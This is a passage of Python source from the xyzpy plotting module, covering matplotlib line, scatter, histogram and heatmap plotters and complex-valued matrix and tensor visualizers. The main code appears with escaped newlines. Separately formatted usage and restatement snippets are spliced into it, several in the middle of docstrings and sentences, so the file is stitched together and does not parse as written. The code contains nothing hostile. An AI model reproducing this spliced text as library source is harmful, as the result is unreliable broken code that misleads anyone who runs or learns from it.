self.plot_colorbar()\n self.set_panel_label()\n return self.show()\n\n\n@mpl_multi_plot\n@intercept_call_arg\ndef lineplot(ds, x, y, z=None, y_err=None, x_err=None, **plot_opts):\n \"\"\"From ``ds`` plot lines of ``y`` as a function of ``x``, optionally for\n varying ``z``.\n\n Parameters\n ----------\n ds : xarray.Dataset\n Dataset to plot from.\n x : str\n Dimension to plot along the x-axis.\n y : str or tuple[str]\n Variable(s) to plot along the y-axis. 
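# Hedged standalone restatement of the limit-syncing step above: give every
# axis in a figure the union of all x/y ranges, so that facets produced by
# `mpl_multi_plot` stay directly comparable (function name illustrative).
def sync_plot_ranges(fig):
    xmins, xmaxs = zip(*(ax.get_xlim() for ax in fig.axes))
    ymins, ymaxs = zip(*(ax.get_ylim() for ax in fig.axes))
    for ax in fig.axes:
        ax.set_xlim(min(xmins), max(xmaxs))
        ax.set_ylim(min(ymins), max(ymaxs))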
If tuple, plot each of the\n variables - instead of ``z``.\n z : str, optional\n Dimension to plot into the page.\n y_err : str, optional\n Variable to plot as y-error.\n x_err : str, optional\n Variable to plot as x-error.\n row : str, optional\n Dimension to vary over as a function of rows.\n col : str, optional\n Dimension to vary over as a function of columns.\n plot_opts\n See ``xyzpy.plot.core.PLOTTER_DEFAULTS``.\n \"\"\"\n return LinePlot(ds, x, y, z, y_err=y_err, x_err=x_err, **plot_opts)\n\n\nclass AutoLinePlot(LinePlot):\n def __init__(self, x, y_z, **lineplot_opts):\n ds = auto_xyz_ds(x, y_z)\n super().__init__(ds, 'x', 'y', z='z', **lineplot_opts)\n\n\ndef auto_lineplot(x, y_z, **lineplot_opts):\n \"\"\"Auto version of :func:`~xyzpy.lineplot` that accepts array arguments\n by converting them to a ``Dataset`` first.\n \"\"\"\n return AutoLinePlot(x, y_z, **lineplot_opts)()\n\n\n# --------------------------------------------------------------------------- #\n\n_SCATTER_ALT_DEFAULTS = (\n ('legend_handlelength', 0),\n)\n\n\nclass Scatter(PlotterMatplotlib, AbstractScatter):\n\n def __init__(self, ds, x, y, z=None, **kwargs):\n # set some scatter specific options\n for k, default in _SCATTER_ALT_DEFAULTS:\n if k not in kwargs:\n kwargs[k] = default\n super().__init__(ds, x, y, z, **kwargs)\n\n def plot_scatter(self):\n \"\"\"\n \"\"\"\n self._legend_handles = []\n self._legend_labels = []\n\n for data in self._gen_xy():\n if 'c' in data:\n col = data['c']\n else:\n col = [next(self._cols)]\n\n scatter_opts = {\n 'c': col,\n 'marker': next(self._mrkrs),\n 's': self._marker_size,\n 'alpha': self.marker_alpha,\n 'label': next(self._zlbls),\n 'zorder': next(self._zordrs),\n 'rasterized': self.rasterize,\n }\n\n if 'c' in data:\n scatter_opts['cmap'] = self.cmap\n\n self._legend_handles.append(\n self._axes.scatter(data['x'], data['y'], **scatter_opts))\n self._legend_labels.append(\n scatter_opts['label'])\n\n def __call__(self):\n self.prepare_data_single()\n # matplotlib preparation\n self.prepare_plot()\n self.plot_scatter()\n self.plot_legend()\n self.plot_colorbar()\n self.set_panel_label()\n return self.show()\n\n\n@mpl_multi_plot\n@intercept_call_arg\ndef scatter(ds, x, y, z=None, y_err=None, x_err=None, **plot_opts):\n \"\"\"From ``ds`` plot a scatter of ``y`` against ``x``, optionally for\n varying ``z``.\n\n Parameters\n ----------\n ds : xarray.Dataset\n Dataset to plot from.\n x : str\n Quantity to plot along the x-axis.\n y : str or tuple[str]\n Quantity(s) to plot along the y-axis. 
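# Hedged usage sketch of the row/col faceting that `mpl_multi_plot` adds to
# the decorated `lineplot` above. Dataset, dims and the top-level import
# path are all illustrative assumptions.
import numpy as np
import xarray as xr
from xyzpy import lineplot

_x = np.linspace(0, 1, 40)
_ds = xr.Dataset(
    {'y': (('sys', 'k', 'x'),
           [[np.sin(2 * np.pi * k * _x) ** p for k in (1, 2)]
            for p in (1, 2)])},
    coords={'x': _x, 'k': [1, 2], 'sys': ['lin', 'sq']},
)
# one column of subplots per value of 'sys', lines distinguished by 'k'
lineplot(_ds, 'x', 'y', z='k', col='sys')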
If tuple, plot each of the\n variables - instead of ``z``.\n z : str, optional\n Dimension to plot into the page.\n y_err : str, optional\n Variable to plot as y-error.\n x_err : str, optional\n Variable to plot as x-error.\n row : str, optional\n Dimension to vary over as a function of rows.\n col : str, optional\n Dimension to vary over as a function of columns.\n plot_opts\n See ``xyzpy.plot.core.PLOTTER_DEFAULTS``.\n \"\"\"\n return Scatter(ds, x, y, z, y_err=y_err, x_err=x_err, **plot_opts)\n\n\nclass AutoScatter(Scatter):\n\n def __init__(self, x, y_z, **scatter_opts):\n ds = auto_xyz_ds(x, y_z)\n super().__init__(ds, 'x', 'y', z='z', **scatter_opts)\n\n\ndef auto_scatter(x, y_z, **scatter_opts):\n \"\"\"Auto version of :func:`~xyzpy.scatter` that accepts array arguments\n by converting them to a ``Dataset`` first.\n \"\"\"\n return AutoScatter(x, y_z, **scatter_opts)()\n\n\n# --------------------------------------------------------------------------- #\n\n_HISTOGRAM_SPECIFIC_OPTIONS = {\n 'stacked': False,\n}\n\n_HISTOGRAM_ALT_DEFAULTS = {\n 'xtitle': 'x',\n 'ytitle': 'f(x)',\n}\n\n\nclass Histogram(PlotterMatplotlib, AbstractHistogram):\n\n def __init__(self, ds, x, z=None, **kwargs):\n\n # Set the alternative defaults\n for opt, default in _HISTOGRAM_ALT_DEFAULTS.items():\n if opt not in kwargs:\n kwargs[opt] = default\n\n # Set histogram specfic options\n for opt, default in _HISTOGRAM_SPECIFIC_OPTIONS.items():\n setattr(self, opt, kwargs.pop(opt, default))\n\n super().__init__(ds, x, None, z=z, **kwargs)\n\n def plot_histogram(self):\n from matplotlib.patches import Rectangle, Polygon\n\n def gen_ind_plots():\n for data in self._gen_xy():\n col = next(self._cols)\n\n edgecolor = col[:3] + (self.marker_alpha * col[3],)\n facecolor = col[:3] + (self.marker_alpha * col[3] / 4,)\n linewidth = next(self._lws)\n zorder = next(self._zordrs)\n label = next(self._zlbls)\n\n handle = Rectangle((0, 0), 1, 1, color=facecolor, ec=edgecolor)\n\n yield (data['x'], edgecolor, facecolor, linewidth, zorder,\n label, handle)\n\n xs, ecs, fcs, lws, zds, lbs, hnds = zip(*gen_ind_plots())\n\n histogram_opts = {\n 'label': lbs,\n 'bins': self.bins,\n 'density': True,\n 'histtype': 'stepfilled',\n 'fill': True,\n 'stacked': self.stacked,\n 'rasterized': self.rasterize,\n }\n\n _, _, patches = self._axes.hist(xs, **histogram_opts)\n\n # Need to set varying colors, linewidths etc seperately\n for patch, ec, fc, lw, zd in zip(patches, ecs, fcs, lws, zds):\n\n # patch is not iterable if only one set of data created\n if isinstance(patch, Polygon):\n patch = (patch,)\n\n for sub_patch in patch:\n sub_patch.set_edgecolor(ec)\n sub_patch.set_facecolor(fc)\n sub_patch.set_linewidth(lw)\n sub_patch.set_zorder(zd)\n\n # store handles for legend\n self._legend_handles, self._legend_labels = hnds, lbs\n\n def __call__(self):\n # Core preparation\n self.prepare_data_single()\n # matplotlib preparation\n self.prepare_plot()\n self.plot_histogram()\n self.plot_legend()\n self.plot_colorbar()\n self.set_panel_label()\n return self.show()\n\n\n@mpl_multi_plot\n@intercept_call_arg\ndef histogram(ds, x, z=None, **plot_opts):\n \"\"\"Dataset histogram.\n\n Parameters\n ----------\n ds : xarray.Dataset\n The dataset to plot.\n x : str, sequence of str\n The variable(s) to plot the probability density of. 
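# Hedged standalone sketch of the proxy-artist trick in `plot_histogram`
# above: `Axes.hist` hands back per-dataset patches, but a unit Rectangle
# with the same face/edge colors makes a cleaner legend handle.
import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle

_fig, _ax = plt.subplots()
_ax.hist([1, 2, 2, 3, 3, 3], bins=3, histtype='stepfilled',
         color=(0.2, 0.5, 0.9, 0.25))
_proxy = Rectangle((0, 0), 1, 1, fc=(0.2, 0.5, 0.9, 0.25),
                   ec=(0.2, 0.5, 0.9, 0.8))
_ax.legend(handles=[_proxy], labels=['series A'])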
If sequence, plot a\n histogram of each instead of using a ``z`` coordinate.\n z : str, optional\n If given, range over this coordinate a plot a histogram for each.\n row : str, optional\n Dimension to vary over as a function of rows.\n col : str, optional\n Dimension to vary over as a function of columns.\n plot_opts\n See ``xyzpy.plot.core.PLOTTER_DEFAULTS``.\n \"\"\"\n return Histogram(ds, x, z=z, **plot_opts)\n\n\nclass AutoHistogram(Histogram):\n\n def __init__(self, x, **histogram_opts):\n ds = auto_xyz_ds(x)\n super().__init__(ds, 'x', **histogram_opts)\n\n\ndef auto_histogram(x, **histogram_opts):\n \"\"\"Auto version of :func:`~xyzpy.histogram` that accepts array arguments\n by converting them to a ``Dataset`` first.\n \"\"\"\n return AutoHistogram(x, **histogram_opts)()\n\n\n# --------------------------------------------------------------------------- #\n\n_HEATMAP_ALT_DEFAULTS = (\n ('legend', False),\n ('colorbar', True),\n ('colormap', 'inferno'),\n ('method', 'pcolormesh'),\n ('gridlines', False),\n ('rasterize', True),\n)\n\n\nclass HeatMap(PlotterMatplotlib, AbstractHeatMap):\n\n def __init__(self, ds, x, y, z, **kwargs):\n # set some heatmap specific options\n for k, default in _HEATMAP_ALT_DEFAULTS:\n if k not in kwargs:\n kwargs[k] = default\n super().__init__(ds, x, y, z, **kwargs)\n\n def plot_heatmap(self):\n \"\"\"Plot the data as a heatmap.\n \"\"\"\n self.calc_color_norm()\n\n # add extra coords since they *bound* the quads placed -> want ticks\n # at center of quads\n X = self._heatmap_x\n av_x_bin = np.mean(np.abs(X[:-1] - X[1:]))\n X = np.append(X - av_x_bin / 2, X[-1] + av_x_bin / 2)\n\n Y = self._heatmap_y\n av_Y_bin = np.mean(np.abs(Y[:-1] - Y[1:]))\n Y = np.append(Y - av_Y_bin / 2, Y[-1] + av_Y_bin / 2)\n\n self._heatmap = getattr(self._axes, self.method)(\n X, Y, self._heatmap_var,\n norm=self._color_norm,\n cmap=xyz_colormaps(self.colormap),\n rasterized=self.rasterize)\n\n def __call__(self):\n # Core preparation\n self.prepare_data_single()\n # matplotlib preparation\n self.prepare_plot()\n self.plot_heatmap()\n self.plot_colorbar()\n self.set_panel_label()\n return self.show()\n\n\n@mpl_multi_plot\n@intercept_call_arg\ndef heatmap(ds, x, y, z, **kwargs):\n \"\"\"From ``ds`` plot variable ``z`` as a function of ``x`` and ``y`` using\n a 2D heatmap.\n\n Parameters\n ----------\n ds : xarray.Dataset\n Dataset to plot from.\n x : str\n Dimension to plot along the x-axis.\n y : str\n Dimension to plot along the y-axis.\n z : str, optional\n Variable to plot as colormap.\n row : str, optional\n Dimension to vary over as a function of rows.\n col : str, optional\n Dimension to vary over as a function of columns.\n plot_opts\n See ``xyzpy.plot.core.PLOTTER_DEFAULTS``.\n \"\"\"\n return HeatMap(ds, x, y, z, **kwargs)\n\n\nclass AutoHeatMap(HeatMap):\n\n def __init__(self, x, **heatmap_opts):\n ds = auto_xyz_ds(x)\n super().__init__(ds, 'y', 'z', 'x', **heatmap_opts)\n\n\ndef auto_heatmap(x, **heatmap_opts):\n \"\"\"Auto version of :func:`~xyzpy.heatmap` that accepts array arguments\n by converting them to a ``Dataset`` first.\n \"\"\"\n return AutoHeatMap(x, **heatmap_opts)()\n\n\n# --------------- Miscellenous matplotlib plotting functions ---------------- #\n\ndef setup_fig_ax(\n nrows=1,\n ncols=1,\n facecolor=None,\n rasterize=False,\n rasterize_dpi=300,\n figsize=(5, 5),\n ax=None,\n **kwargs,\n):\n import matplotlib.pyplot as plt\n\n if ax is None:\n fig, ax = plt.subplots(nrows, ncols, figsize=figsize, **kwargs)\n\n fig.patch.set_alpha(0.0)\n else:\n fig 
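# Hedged standalone restatement of the half-bin padding in `plot_heatmap`
# above: pcolormesh takes quad *edges*, so pad each coordinate by half the
# mean bin width so every quad is centred on its data point.
import numpy as np

def centers_to_edges(X):
    half_bin = np.mean(np.abs(np.diff(X))) / 2
    return np.append(X - half_bin, X[-1] + half_bin)

print(centers_to_edges(np.array([0.0, 1.0, 2.0])))  # [-0.5  0.5  1.5  2.5]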
= None\n\n if not isinstance(ax, np.ndarray):\n # squeezed to single axis\n ax.set_aspect('equal')\n ax.axis('off')\n\n if facecolor is not None:\n fig.patch.set_facecolor(facecolor)\n\n if rasterize:\n ax.set_rasterization_zorder(0)\n if fig is not None:\n fig.set_dpi(rasterize_dpi)\n\n return fig, ax\n\n\ndef show_and_close(fn):\n\n @functools.wraps(fn)\n def wrapped(*args, show_and_close=True, **kwargs):\n import warnings\n import matplotlib.pyplot as plt\n\n # remove annoying regular warning about all-nan slices\n with warnings.catch_warnings():\n warnings.filterwarnings(\n action='ignore',\n message='All-NaN slice',\n )\n fig, ax = fn(*args, **kwargs)\n\n if fig is not None:\n if show_and_close:\n plt.show()\n plt.close(fig)\n\n return fig, ax\n\n return wrapped\n\n\ndef choose_squarest_grid(x):\n p = x ** 0.5\n if p.is_integer():\n m = n = int(p)\n else:\n m = int(round(p))\n p = int(p)\n n = p if m * p >= x else p + 1\n return m, n\n\n\ndef _compute_hue(z):\n # the constant rotation is to have blue and orange as + and -\n # negation puts +i as green -i as pink\n return ((-np.angle(z) + 9 * np.pi / 8) / (2 * np.pi)) % 1\n\n\ndef to_colors(\n zs,\n magscale='linear',\n max_mag=None,\n alpha_map=True,\n alpha_pow=1/2,\n):\n import matplotlib as mpl\n arraymag = np.abs(zs)\n\n if magscale == 'linear':\n mapped_mag = arraymag\n elif magscale == 'log':\n # XXX: need some kind of cutoff?\n raise NotImplementedError(\"log scale not implemented.\")\n else:\n # more robust way to 'flatten' the perceived magnitude\n mapped_mag = arraymag**magscale\n\n if max_mag is None:\n max_mag = np.max(mapped_mag)\n\n hue = _compute_hue(zs)\n sat = mapped_mag / max_mag\n val = np.tile(1.0, hue.shape)\n zs = mpl.colors.hsv_to_rgb(np.stack((hue, sat, val), axis=-1))\n\n if alpha_map:\n # append alpha channel\n zalpha = (mapped_mag / max_mag)**alpha_pow\n zs = np.concatenate([zs, np.expand_dims(zalpha, -1)], axis=-1)\n\n return zs, mapped_mag, max_mag\n\n\ndef add_visualize_legend(\n ax,\n complexobj,\n max_mag,\n max_projections=2,\n auto_pad=0.03,\n legend_loc='auto',\n legend_size=0.15,\n legend_bounds=None,\n legend_resolution=3,\n):\n import matplotlib as mpl\n\n # choose where to put the legend\n if legend_bounds is None:\n if legend_loc == 'auto':\n if (max_projections <= 2):\n # move compass and legends beyond the plot rectangle, which\n # will be filled when there are only 2 plot dimensions\n legend_loc = (1 - auto_pad, 0.0 - legend_size + auto_pad)\n else:\n # occupy space within the rectangle\n legend_loc = (1.0 - legend_size, 0.0)\n legend_bounds = (*legend_loc, legend_size, legend_size)\n\n lax = ax.inset_axes(legend_bounds)\n lax.axis('off')\n lax.set_aspect('equal')\n\n num = legend_resolution * 2 + 1\n if complexobj:\n re = np.linspace(-1, 1, num=num).reshape(1, -1)\n im = 1j * np.linspace(1, -1, num=num).reshape(-1, 1)\n z = re + im\n else:\n re = np.linspace(-1, 1, num=num)\n # repeat a few times to make the bar thick enough\n z = np.tile(re, (max(1, legend_resolution // 3), 1))\n\n zmag = np.abs(z)\n mask = zmag > 1.0\n z[mask] = zmag[mask] = 0.0\n\n # compute the color for each point\n hue = _compute_hue(z)\n sat = zmag\n val = np.tile(1.0, hue.shape)\n\n # convert to rgb\n bars = mpl.colors.hsv_to_rgb(np.stack((hue, sat, val), axis=-1))\n # add alpha channel\n bars = np.concatenate([bars, np.tile(1.0, hue.shape + (1,))], -1)\n # add make area outside disk transparent\n bars[..., 3][mask] = 0.0\n\n # plot the actual colorbar legend\n lax.imshow(bars)\n\n # add axis orientation labels\n 
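# The grid chooser above in action (values checked by hand): pick (m, n)
# with m * n >= x and the two factors as close to square as possible.
for _n in (5, 7, 9, 12):
    print(_n, choose_squarest_grid(_n))
# 5 -> (2, 3), 7 -> (3, 3), 9 -> (3, 3), 12 -> (3, 4)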
lax.text(1.02, 0.5, '$+1$', ha='left', va='center',\n transform=lax.transAxes, color=(.5, .5, .5), size=6)\n lax.text(-0.02, 0.5, '$-1$', ha='right', va='center',\n transform=lax.transAxes, color=(.5, .5, .5), size=6)\n if complexobj:\n lax.text(0.5, -0.02, '$-j$', ha='center', va='top',\n transform=lax.transAxes, color=(.5, .5, .5), size=6)\n lax.text(0.5, 1.02, '$+j$', ha='center', va='bottom',\n transform=lax.transAxes, color=(.5, .5, .5), size=6)\n\n # show the overall scale\n if complexobj:\n overall_scale_opts = {'x': .85, 'y': .15, 'ha': 'left'}\n else:\n overall_scale_opts = {'x': .5, 'y': -0.15, 'ha': 'center'}\n\n lax.text(\n s=f'$\\\\times {float(max_mag):.3}$', va='top',\n **overall_scale_opts, transform=lax.transAxes,\n color=(.5, .5, .5), size=6\n )\n\ndef make_ax_square_after_plotted(ax):\n xmin, xmax = ax.get_xlim()\n xrange = abs(xmax - xmin)\n ymin, ymax = ax.get_ylim()\n yrange = abs(ymax - ymin)\n\n # pad either x or y to make square\n if xrange > yrange:\n ypad = (xrange - yrange) / 2\n if ymin > ymax:\n # fipped y axis\n ax.set_ylim(ymin + ypad, ymax - ypad)\n else:\n ax.set_ylim(ymin - ypad, ymax + ypad)\n\n elif yrange > xrange:\n xpad = (yrange - xrange) / 2\n if xmin > xmax:\n # flipped x axis\n ax.set_xlim(xmin + xpad, xmax - xpad)\n else:\n ax.set_xlim(xmin - xpad, xmax + xpad)\n\n\ndef handle_sequence_of_arrays(f):\n \"\"\"Simple wrapper to handle sequence of arrays as input to e.g.\n ``visualize_tensor``.\n \"\"\"\n\n @functools.wraps(f)\n def wrapped(array, *args, show_and_close=True, **kwargs):\n import matplotlib.pyplot as plt\n\n if (\n isinstance(array, (tuple, list)) and\n all(hasattr(x, 'shape') for x in array)\n ):\n # assume sequence of tensors to plot\n figsize = kwargs.get('figsize', (5, 5))\n rasterize_dpi = kwargs.get('rasterize_dpi', 300)\n nplot = len(array)\n fig, axs = plt.subplots(\n 1, nplot, figsize=figsize, squeeze=False, sharey=True,\n )\n fig.set_dpi(rasterize_dpi)\n fig.patch.set_alpha(0.0)\n\n # plot all tensors with same magnitude scale\n kwargs.setdefault(\"max_mag\", max(np.max(np.abs(x)) for x in array))\n\n # only show legend on last plot\n legend = kwargs.pop('legend', False)\n\n for i in range(nplot):\n f(\n array[i], *args,\n ax=axs[0, i],\n # only show legend on last plot\n legend=(legend and i == nplot - 1),\n show_and_close=False,\n **kwargs\n )\n make_ax_square_after_plotted(axs[0, i])\n\n if show_and_close:\n plt.show()\n plt.close(fig)\n return fig, axs\n\n else:\n # treat as single tensor\n return f(array, *args, show_and_close=show_and_close, **kwargs)\n\n return wrapped\n\n\n@handle_sequence_of_arrays\n@show_and_close\ndef visualize_matrix(\n array,\n max_mag=None,\n magscale='linear',\n alpha_map=True,\n alpha_pow=1/2,\n legend=False,\n legend_loc='auto',\n legend_size=0.15,\n legend_bounds=None,\n legend_resolution=3,\n facecolor=None,\n rasterize=4096,\n rasterize_dpi=300,\n figsize=(5, 5),\n ax=None,\n):\n # can only plot numpy\n array = np.asarray(array)\n if array.ndim == 1:\n # draw vectors as diagonals\n array = np.diag(array)\n\n if isinstance(rasterize, (float, int)):\n # only turn on above a certain size\n rasterize = array.size > rasterize\n\n fig, ax = setup_fig_ax(\n facecolor=facecolor,\n rasterize=rasterize,\n rasterize_dpi=rasterize_dpi,\n figsize=figsize,\n ax=ax,\n )\n\n zs, _, max_mag = to_colors(\n array,\n magscale=magscale,\n max_mag=max_mag,\n alpha_map=alpha_map,\n alpha_pow=alpha_pow,\n )\n ax.imshow(zs, interpolation='nearest', zorder=-1)\n\n if legend:\n add_visualize_legend(\n ax=ax,\n 
complexobj=np.iscomplexobj(array),\n max_mag=max_mag,\n max_projections=2,\n legend_loc=legend_loc,\n legend_size=legend_size,\n legend_bounds=legend_bounds,\n legend_resolution=legend_resolution,\n )\n\n return fig, ax\n\n\n@handle_sequence_of_arrays\n@show_and_close\ndef visualize_tensor(\n array,\n max_projections=None,\n angles=None,\n scales=None,\n projection_overlap_spacing=1.05,\n skew_factor=0.05,\n spacing_factor=1.0,\n magscale='linear',\n size_map=True,\n size_pow=1/2,\n size_scale=1.0,\n alpha_map=True,\n alpha_pow=1/2,\n alpha=0.8,\n marker='o',\n linewidths=0,\n show_lattice=True,\n lattice_opts=None,\n compass=False,\n compass_loc='auto',\n compass_size=0.1,\n compass_bounds=None,\n compass_labels=None,\n compass_opts=None,\n max_mag=None,\n legend=False,\n legend_loc='auto',\n legend_size=0.15,\n legend_bounds=None,\n legend_resolution=3,\n interleave_projections=False,\n reverse_projections=False,\n facecolor=None,\n rasterize=4096,\n rasterize_dpi=300,\n figsize=(5, 5),\n ax=None,\n):\n \"\"\"Visualize all entries of a tensor, with indices mapped into the plane\n and values mapped into a color wheel.\n\n Parameters\n ----------\n array : numpy.ndarray\n The tensor to visualize.\n skew_factor : float, optional\n When there are more than two dimensions, a factor to scale the\n rotations by to avoid overlapping data points.\n size_map : bool, optional\n Whether to map the tensor value magnitudes to marker size.\n size_scale : float, optional\n An overall factor to scale the marker size by.\n alpha_map : bool, optional\n Whether to map the tensor value magnitudes to marker alpha.\n alpha_pow : float, optional\n The power to raise the magnitude to when mapping to alpha.\n alpha : float, optional\n The overall alpha to use for all markers if ``not alpha_map``.\n show_lattice : bool, optional\n Show a small grey dot for every 'lattice' point regardless of value.\n lattice_opts : dict, optional\n Options to pass to ``maplotlib.Axis.scatter`` for the lattice points.\n linewidths : float, optional\n The linewidth to use for the markers.\n marker : str, optional\n The marker to use for the markers.\n figsize : tuple, optional\n The size of the figure to create, if ``ax`` is not provided.\n ax : matplotlib.Axis, optional\n The axis to draw to. 
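# Hedged usage sketch for `visualize_matrix` above: complex entries map
# phase to hue and magnitude to saturation/alpha. Passing a list of arrays
# goes through `handle_sequence_of_arrays`, plotting them side by side with
# a shared magnitude scale.
import numpy as np

_rng = np.random.default_rng(42)
_A = _rng.normal(size=(32, 32)) + 1j * _rng.normal(size=(32, 32))
visualize_matrix(_A, legend=True)
visualize_matrix([_A, _A @ _A])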
If not provided, a new figure will be created.\n\n Returns\n -------\n fig : matplotlib.Figure\n The figure containing the plot, or ``None`` if ``ax`` was provided.\n ax : matplotlib.Axis\n The axis containing the plot.\n \"\"\"\n import matplotlib as mpl\n\n # can only plot numpy\n array = np.asarray(array)\n\n if isinstance(rasterize, (float, int)):\n # only turn on above a certain size\n rasterize = array.size > rasterize\n\n fig, ax = setup_fig_ax(\n facecolor=facecolor,\n rasterize=rasterize,\n rasterize_dpi=rasterize_dpi,\n figsize=figsize,\n ax=ax,\n )\n\n auto_angles = angles is None\n if scales == \"equal\":\n scales = [1] * array.ndim\n auto_scales = scales is None\n\n if max_projections is None:\n max_projections = array.ndim\n\n # map each dimension to an angle\n if not auto_angles:\n angles = np.array(angles)\n else:\n # if max_projections == array.ndim, then each dimension has its own\n # angle, if max_projections < array.dim, then we will\n # reuse the same angles, initially round robin distributed\n angles = np.tile(\n np.linspace(0.0, np.pi, max_projections, endpoint=False),\n array.ndim // max_projections + 1\n )[:array.ndim]\n\n if not interleave_projections:\n # 'fill up' one angle before moving on, rather than round-robin,\n # doing this matches the behavior of fusing adjacent dimensions\n angles = np.sort(angles)\n\n def angle_modulate(x):\n return x * (x - np.pi / 2) * (x - x[-1])\n\n # modulate the angles slightly to avoid overlapping data points\n angles += angle_modulate(angles) * skew_factor\n\n if auto_scales:\n scales = np.empty(angles.shape)\n else:\n scales = np.array(scales)\n\n # the logic here is, when grouping dimensions into the same angles we\n # need to offset each overlapping dimension by increasing amount\n first_size = {}\n grouped_size = {}\n group_counter = {}\n group_rank = {}\n fastest_varying = []\n\n iphis = list(enumerate(angles))\n if not reverse_projections:\n iphis.reverse()\n\n for i, phi in iphis:\n if phi not in first_size:\n # first time we have encountered an axis at this angle\n fastest_varying.append((i, array.shape[i]))\n first_size[phi] = array.shape[i]\n grouped_size[phi] = array.shape[i]\n group_counter[phi] = 1\n else:\n # already an axis at this angle, space this one larger\n grouped_size[phi] *= array.shape[i]\n group_counter[phi] += 1\n\n # what rank among axes at this angle is i?\n group_rank[i] = group_counter[phi]\n\n if auto_scales:\n scales[i] = (\n grouped_size[phi] // array.shape[i]\n # put extra space between distinct dimensions\n * projection_overlap_spacing**group_counter[phi]\n # account for spacing out of first dimensions\n / max(1, (first_size[phi] - 1))**spacing_factor\n )\n\n eff_width = max(grouped_size.values())\n eff_ndim = max_projections\n\n # define the core mappings of coordinate to 2D plane\n\n def xcomponent(i, coo):\n return scales[i] * np.sin(angles[i]) * coo\n\n def ycomponent(i, coo):\n return scales[i] * -np.cos(angles[i]) * coo\n\n # compute projection into 2D coordinates for every index location\n coos = np.indices(array.shape)\n x = np.zeros(array.shape)\n y = np.zeros(array.shape)\n for i, coo in enumerate(coos):\n x += xcomponent(i, coo)\n y += ycomponent(i, coo)\n\n # compute colors\n zs, mapped_mag, max_mag = to_colors(\n array.flat,\n magscale=magscale,\n max_mag=max_mag,\n alpha_map=alpha_map,\n alpha_pow=alpha_pow,\n )\n\n # compute a sensible base size based on expected density of points\n base_size = size_scale * 3000 / (eff_width * eff_ndim**1.2)\n if size_map:\n s = base_size * 
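# Hedged standalone restatement of the index projection used above: each
# tensor dimension gets an angle in the plane, and every index contributes
# (sin, -cos) components along its dimension's direction (function name
# illustrative, without the grouping/skew refinements).
import numpy as np

def project_indices(shape, angles, scales=None):
    scales = np.ones(len(shape)) if scales is None else np.asarray(scales)
    coos = np.indices(shape)
    x = sum(s * np.sin(a) * c for s, a, c in zip(scales, angles, coos))
    y = sum(s * -np.cos(a) * c for s, a, c in zip(scales, angles, coos))
    return x, y

_px, _py = project_indices((2, 3, 4), np.linspace(0, np.pi, 3, endpoint=False))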
(mapped_mag / max_mag)**size_pow\n else:\n s = base_size\n\n if show_lattice:\n # put a small grey line on every edge\n ls = []\n for i, isize in fastest_varying:\n other_shape = array.shape[:i] + array.shape[i + 1:]\n other_coos = np.indices(other_shape)\n coo_start = np.insert(other_coos, i, 0, 0)\n coo_stop = np.insert(other_coos, i, isize - 1, 0)\n\n xi = np.zeros(coo_start.shape)\n yi = np.zeros(coo_start.shape)\n\n for i, coo in enumerate(coo_start):\n xi += xcomponent(i, coo)\n yi += ycomponent(i, coo)\n\n xf = np.zeros(coo_start.shape)\n yf = np.zeros(coo_start.shape)\n\n for i, coo in enumerate(coo_stop):\n xf += xcomponent(i, coo)\n yf += ycomponent(i, coo)\n\n li = np.stack((xi.flat, yi.flat), 1)\n lf = np.stack((xf.flat, yf.flat), 1)\n\n ls.append(np.stack((li, lf), 1))\n\n segments = np.concatenate(ls)\n\n lattice_opts = {} if lattice_opts is None else dict(lattice_opts)\n lattice_opts.setdefault('color', (.6, .6, .6))\n lattice_opts.setdefault(\n 'alpha',\n 0.01 + 2**(-(array.size**0.2 + eff_ndim**0.8))\n )\n lattice_opts.setdefault('linewidth', 1)\n lattice_opts.setdefault('zorder', -2)\n lines = mpl.collections.LineCollection(segments, **lattice_opts)\n ax.add_collection(lines)\n\n # plot the actual points\n ax.scatter(\n # mapped variables\n # (reverse the data so that the correct points are shown on top)\n x=x.flat[::-1],\n y=y.flat[::-1],\n c=zs[::-1],\n s=s[::-1] if size_map else s,\n # constants\n alpha=None if alpha_map else alpha, # folded into color if alpha_map\n linewidths=linewidths,\n marker=marker,\n zorder=-1,\n clip_on=False,\n )\n\n if compass:\n # choose where to put the compass\n if compass_bounds is None:\n if compass_loc == 'auto':\n if (max_projections <= 2):\n # move compass and legends beyond the plot rectangle, which\n # will be filled when there are only 2 plot dimensions\n compass_loc = (-0.05, 1.0 - compass_size + 0.05)\n else:\n # occupy space within the rectangle\n compass_loc = (0.0, 1 - compass_size)\n compass_bounds = (*compass_loc, compass_size, compass_size)\n\n cax = ax.inset_axes(compass_bounds)\n cax.axis('off')\n cax.set_aspect('equal')\n\n compass_opts = {} if compass_opts is None else dict(compass_opts)\n compass_opts.setdefault('color', (0.5, 0.5, 0.5))\n compass_opts.setdefault('width', 0.002)\n compass_opts.setdefault('length_includes_head', True)\n\n if compass_labels is None:\n compass_labels = range(len(angles))\n elif compass_labels is False:\n compass_labels = [''] * len(angles)\n\n for i, phi in enumerate(angles):\n dx = np.sin(phi) * group_rank[i]\n dy = -np.cos(phi) * group_rank[i]\n cax.arrow(0, 0, dx, dy, **compass_opts)\n cax.text(\n dx, dy, f\" {compass_labels[i]}\",\n ha='left', va='top',\n color=compass_opts['color'],\n size=6,\n rotation=180 * phi / np.pi - 90,\n rotation_mode='anchor',\n )\n\n if legend:\n add_visualize_legend(\n ax=ax,\n complexobj=np.iscomplexobj(array),\n max_mag=max_mag,\n max_projections=max_projections,\n legend_loc=legend_loc,\n legend_size=legend_size,\n legend_bounds=legend_bounds,\n legend_resolution=legend_resolution,\n )\n\n return fig, ax\n\n\n@functools.lru_cache(16)\ndef get_neutral_style(draw_color=(.5, .5, .5)):\n return {\n 'axes.edgecolor': draw_color,\n 'axes.facecolor': (0, 0, 0, 0),\n 'axes.grid': True,\n 'axes.labelcolor': draw_color,\n 'axes.spines.right': False,\n 'axes.spines.top': False,\n 'figure.facecolor': (0, 0, 0, 0),\n 'grid.alpha': 0.1,\n 'grid.color': draw_color,\n 'legend.frameon': False,\n 'text.color': draw_color,\n 'xtick.color': draw_color,\n 
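# Hedged usage sketch for `visualize_tensor` above (shape illustrative):
# a rank-4 tensor with a dimension compass and the color-wheel legend.
import numpy as np

_t = np.random.default_rng(0).normal(size=(2, 3, 4, 5))
visualize_tensor(_t, compass=True, legend=True)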
